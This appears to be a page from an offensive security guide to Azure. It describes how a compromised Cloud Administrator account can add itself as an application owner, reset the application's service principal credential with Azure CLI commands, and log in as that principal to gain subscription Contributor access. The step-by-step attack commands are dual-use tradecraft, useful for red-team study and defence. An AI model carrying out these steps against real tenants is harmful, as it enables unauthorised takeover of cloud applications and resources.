Abusing Cloud Administrator Role

In this section we'll tackle an attack scenario that sees us compromising a Cloud Administrator account and wanting to get access to an application we don't have access to. This application has a Contributor RBAC role to the subscription so we'll end up assigning ourselves access to the app, resetting its service principal account and logging in with the newly-set password.

The first step of the attack is adding ourselves as Application Owner, this can be done using the AZCli

PS /home/otter> az ad app owner add --id <application_id> <user_id>
# we can confirm the changes by listing all the owners of the application
PS /home/otter> az ad app owner list --id <application_id>

Now we can reset the password of the Service Principal account

PS /home/otter> az ad sp credential reset --id <application_id>

this command will return a JSON object of this format

{
	"appId": "<application_id>",
	"password": "<new_service_principal_password>",
	"tenant": "<tenant_id>"
}

With the SP password we are able to log into the application via single-factor log-in as the SP

PS /home/otter> az login --service-prinipal -u <application_id> -p <new_service_principal_password> --tenant <tenant_id>

The extreme summary is: once we compromise a Cloud Administrator account, we have control over all the applications in the tenant that have the Contributor RBAC role assigned to them.

PreviousAbusing Device Code Authentication NextAbusing User Administrator Role

Last updated 11 months ago